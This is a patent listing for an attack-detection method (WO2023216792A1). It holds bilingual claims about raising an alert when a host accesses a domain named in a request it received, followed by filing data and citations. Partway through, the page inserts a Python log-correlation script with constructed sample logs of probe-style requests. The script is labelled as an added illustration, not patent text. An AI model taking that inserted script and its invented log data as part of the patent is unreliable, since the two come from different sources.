    获取模块,用于获取所述主机的网络日志,所述网络日志中包括第一请求报文的参数信息,所述第一请求报文是主机接收到的来自其它设备的请求报文,所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名;An acquisition module, configured to acquire the network log of the host. The network log includes parameter information of a first request message. The first request message is a request message received by the host from other devices. The parameter information includes the first domain name included in the payload part of the first request message;
    所述获取模块还用于,获取所述主机的主机日志,所述主机日志包括所述主机访问的至少一个域名; The acquisition module is also configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host;
    处理模块,用于若所述至少一个域名包括所述第一域名,则产生告警信息,所述告警信息用于指示所述主机被攻击。A processing module configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm information is used to indicate that the host is attacked.
  19. 根据权利要求18所述的检测装置,其特征在于,所述获取模块,用于通过挂钩hook网络函数,获取所述主机的网络日志,以及通过hook操作***中的shell执行过程,获取所述主机的主机日志。The detection device according to claim 18, characterized in that the acquisition module is used to acquire the network log of the host by hooking a network function, and acquire the host by hooking a shell execution process in the operating system. host logs.
  20. 一种检测装置,其特征在于,应用于检测设备,所述装置包括:A detection device, characterized in that it is applied to detection equipment, and the device includes:
    获取模块,用于获取主机的网络日志,所述网络日志中包括第一请求报文的参数信息,所述第一请求报文是所述主机接收到的来自其它设备的请求报文,所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名;Obtaining module, used to obtain the network log of the host. The network log includes parameter information of the first request message. The first request message is a request message from other devices received by the host. The parameter information includes the first domain name included in the payload part of the first request message;
    所述获取模块,还用于获取所述主机的主机日志,所述主机日志包括所述主机访问的至少一个域名;The acquisition module is also used to obtain the host log of the host, where the host log includes at least one domain name accessed by the host;
    处理模块,用于若所述至少一个域名包括所述第一域名,则产生告警信息,所述告警用于指示所述主机被攻击。A processing module, configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm is used to indicate that the host is attacked.
  21. 根据权利要求20所述的装置,其特征在于,所述参数信息还包括所述主机接收到所述第一请求报文的时刻,所述主机日志还包括所述至少一个域名中每个域名分别对应的时刻,其中,所述主机日志中的第二域名对应的时刻为所述主机访问所述第二域名的时刻,所述至少一个域名包括所述第二域名。The device according to claim 20, wherein the parameter information further includes the time when the host receives the first request message, and the host log further includes the respective domain names of each domain name in the at least one domain name. The corresponding time, wherein the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
  22. 根据权利要求21所述的装置,其特征在于,所述若所述至少一个域名包括所述第一域名,则所述处理模块,用于:The device according to claim 21, wherein if the at least one domain name includes the first domain name, the processing module is configured to:
    若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻,则产生所述告警信息。If the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, then the Alarm information.
  23. 根据权利要求22所述的装置,其特征在于,所述若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻,则所述处理模块,用于:The device according to claim 22, wherein if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than when the host receives At the time of the first request message, the processing module is used to:
    若所述至少一个域名包括所述第一域名、所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻、且所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值,则产生所述告警信息。If the at least one domain name includes the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the host log If the difference between the time corresponding to the first domain name included in and the time when the host receives the first request message is less than or equal to the preset time threshold, the alarm information is generated.
  24. The apparatus according to any one of claims 20 to 23, wherein the detection device is a separate computer device having a network connection to the host, and the acquisition module is configured to:
    receive the network log sent by a security device, the security device being deployed between the other device and the host; and
    receive the host log sent by the host.
  25. The apparatus according to claim 24, wherein the detection device, the security device, and the host are located in the same local area network.
  26. The apparatus according to claim 24, wherein the detection device is deployed in the Internet.
  27. A device, comprising a processor and a memory;
    the memory being configured to store instructions or a computer program; and
    the processor being configured to execute the instructions or computer program so as to perform the method according to any one of claims 1 to 10.
  28. A computer-readable storage medium, comprising instructions or a computer program which, when run on a computer, cause the computer to perform the method according to any one of claims 1 to 10.
  29. A computer program product, comprising a computer program which, when run on a processor, implements the method according to any one of claims 1 to 10.
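The timing check that claims 21 to 23 describe (alarm only when the host accesses the domain name carried in a request after it received that request, and within a preset threshold) can be shown as a small log-correlation script. The following is an added example written for this page, not code from the patent or its applicant; the network-log and host-log line formats, host names, domain names and the 30-second default threshold are constructed assumptions, and the "security device" and "host" sources are stood in for by inline strings.

```python
"""Correlate a network log with a host log: alert when a host looks up a
domain name that an inbound request named, shortly after receiving it.
Added illustration; the log formats below are constructed for this example."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed network log: one line per request the security device saw the
# host receive, with the URI the request carried (claims: "network log").
NETWORK_LOG = """\
2023-04-11T10:00:00Z host=web01 src=203.0.113.7 method=GET uri=/fetch?url=http://probe-a.example/x
2023-04-11T10:00:05Z host=web01 src=203.0.113.7 method=GET uri=/fetch?url=http://probe-b.example/y
2023-04-11T10:00:09Z host=web02 src=198.51.100.3 method=GET uri=/img?src=https://cdn-c.example/logo.png
2023-04-11T10:00:12Z host=web01 src=203.0.113.7 method=GET uri=/health
"""

# Constructed host log: domain names each host itself looked up, with the
# time of the lookup (claims: "host log" with a time per domain name).
HOST_LOG = """\
2023-04-11T09:59:30Z host=web01 query=probe-a.example
2023-04-11T10:00:06Z host=web01 query=probe-b.example
2023-04-11T10:00:07Z host=web01 query=update.vendor.example
2023-04-11T10:05:00Z host=web02 query=cdn-c.example
"""


@dataclass(frozen=True)
class RequestRecord:
    host: str              # host that received the request
    received_at: datetime  # time the host received it
    domain: str            # a domain name found in the request parameters


@dataclass(frozen=True)
class AccessRecord:
    host: str
    accessed_at: datetime
    domain: str


@dataclass(frozen=True)
class Alert:
    host: str
    domain: str
    received_at: datetime
    accessed_at: datetime
    delay: timedelta


_BARE_DOMAIN = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.IGNORECASE)


def _parse_line(line: str) -> Tuple[datetime, Dict[str, str]]:
    """Split '<ISO8601 UTC timestamp> k=v k=v ...' into a time and a field map."""
    ts, _, rest = line.partition(" ")
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    # \S+ is greedy, so a value like /fetch?url=http://... stays in one piece.
    return when, dict(re.findall(r"(\w+)=(\S+)", rest))


def extract_domains(uri: str) -> List[str]:
    """Domain names carried in the query parameters of a request URI,
    either inside a URL value or as a bare host name."""
    domains: List[str] = []
    for _, value in parse_qsl(urlsplit(uri).query):
        host = urlsplit(value).hostname if "://" in value else None
        if host is None and _BARE_DOMAIN.match(value):
            host = value.lower()
        if host and host not in domains:
            domains.append(host)
    return domains


def parse_network_log(text: str) -> List[RequestRecord]:
    records = []
    for line in text.splitlines():
        when, f = _parse_line(line)
        for domain in extract_domains(f.get("uri", "")):
            records.append(RequestRecord(f["host"], when, domain))
    return records


def parse_host_log(text: str) -> List[AccessRecord]:
    records = []
    for line in text.splitlines():
        when, f = _parse_line(line)
        records.append(AccessRecord(f["host"], when, f["query"].lower()))
    return records


def correlate(requests: List[RequestRecord], accesses: List[AccessRecord],
              threshold: timedelta) -> List[Alert]:
    """Alert when the same host accessed the request's domain strictly after
    receiving the request and no more than `threshold` later (claims 22-23)."""
    by_key: Dict[Tuple[str, str], List[datetime]] = {}
    for a in accesses:
        by_key.setdefault((a.host, a.domain), []).append(a.accessed_at)
    alerts = []
    for r in requests:
        for t in sorted(by_key.get((r.host, r.domain), [])):
            delay = t - r.received_at
            # An access before the request is unrelated to it; one outside the
            # window is too far away to attribute. Neither raises an alert.
            if t > r.received_at and delay <= threshold:
                alerts.append(Alert(r.host, r.domain, r.received_at, t, delay))
                break  # one alert per request is enough
    return alerts


def detect(network_log: str, host_log: str, threshold_seconds: int = 30) -> List[Alert]:
    return correlate(parse_network_log(network_log), parse_host_log(host_log),
                     timedelta(seconds=threshold_seconds))


if __name__ == "__main__":
    for a in detect(NETWORK_LOG, HOST_LOG):
        print(f"ALERT {a.host}: looked up {a.domain} {a.delay.total_seconds():.0f}s "
              f"after receiving a request naming it at {a.received_at.isoformat()}")
```

With the constructed logs only `probe-b.example` produces an alert: web01 looked it up one second after receiving the request that named it. `probe-a.example` was looked up before the request arrived, so the "later than" condition of claim 22 excludes it, and `cdn-c.example` was looked up 291 seconds after the request, outside the 30-second window of claim 23 (raising the threshold to 600 seconds admits it). In a deployment the threshold is the main tuning knob: too small and slow-acting hosts are missed, too large and ordinary traffic to popular domains starts to coincide with unrelated requests.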
PCT/CN2023/087493 2022-05-07 2023-04-11 Attack detection method, and apparatus WO2023216792A1 (en)

Applications Claiming Priority (2)

Application Number Priority Date Filing Date Title
CN202210493521.XA CN117061139A (en) 2022-05-07 2022-05-07 Attack detection method and device
CN202210493521.X 2022-05-07

Publications (1)

Publication Number Publication Date
WO2023216792A1 true WO2023216792A1 (en) 2023-11-16

Family

ID=88663253

Family Applications (1)

Application Number Title Priority Date Filing Date
PCT/CN2023/087493 WO2023216792A1 (en) 2022-05-07 2023-04-11 Attack detection method, and apparatus

Country Status (2)

Country Link
CN (1) CN117061139A (en)
WO (1) WO2023216792A1 (en)

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20160014146A1 (en) * 2013-02-21 2016-01-14 Nippon Telegraph And Telephone Corporation Network monitoring apparatus, network monitoring method, and network monitoring program
CN108471429A (en) * 2018-06-29 2018-08-31 北京奇虎科技有限公司 A kind of network attack alarm method and system
CN108667854A (en) * 2018-06-29 2018-10-16 北京奇虎科技有限公司 Network hole detection method and device, network hole automated pubilication system
CN108833185A (en) * 2018-06-29 2018-11-16 北京奇虎科技有限公司 A kind of network attack route restoring method and system
CN110336770A (en) * 2019-04-04 2019-10-15 平安科技(深圳)有限公司 Method, apparatus, equipment and the storage medium of long-range monitoring loophole
CN112543177A (en) * 2020-10-26 2021-03-23 西安交大捷普网络科技有限公司 Network attack detection method and device
US20220038480A1 (en) * 2020-07-29 2022-02-03 Denso Corporation Security monitoring system

Also Published As

Publication number Publication date
CN117061139A (en) 2023-11-14

Similar Documents

Publication Publication Date Title
US11271907B2 (en) Smart proxy for a large scale high-interaction honeypot farm
US11265346B2 (en) Large scale high-interactive honeypot farm
EP3507964B1 (en) Malware detection for proxy server networks
US9769204B2 (en) Distributed system for Bot detection
JP5518594B2 (en) Internal network management system, internal network management method and program
US20170093891A1 (en) Mobile device-based intrusion prevention system
EP2143033B1 (en) Detecting compromised computers by correlating reputation data with web access logs
US20200351288A1 (en) System and method for detecting computer network intrusions
CN111385376B (en) Illegal external connection monitoring method, device, system and equipment for terminal
KR20140045448A (en) System and method for protocol fingerprinting and reputation correlation
US10999304B2 (en) Bind shell attack detection
JP2005135420A (en) Host based network intrusion detection system and method, and computer-readable medium
US20090178140A1 (en) Network intrusion detection system
JP6086423B2 (en) Unauthorized communication detection method by collating observation information of multiple sensors
EP3590061B1 (en) Managing data encrypting application
CN111371774A (en) Information processing method and device, equipment and storage medium
JP2014123996A (en) Network monitoring apparatus and program
WO2022166166A1 (en) Function verification method and apparatus for security component
JP2019152912A (en) Unauthorized communication handling system and method
WO2023216792A1 (en) Attack detection method, and apparatus
CN114172881B (en) Network security verification method, device and system based on prediction
Zeng Intrusion detection system of ipv6 based on protocol analysis
JP6635029B2 (en) Information processing apparatus, information processing system, and communication history analysis method
US20090144822A1 (en) Withholding last packet of undesirable file transfer
TW201633205A (en) Systems and methods for malicious code detection

Legal Events

Date Code Title Description
121 Ep: the epo has been informed by wipo that ep was designated in this application

Ref document number: 23802567

Country of ref document: EP

Kind code of ref document: A1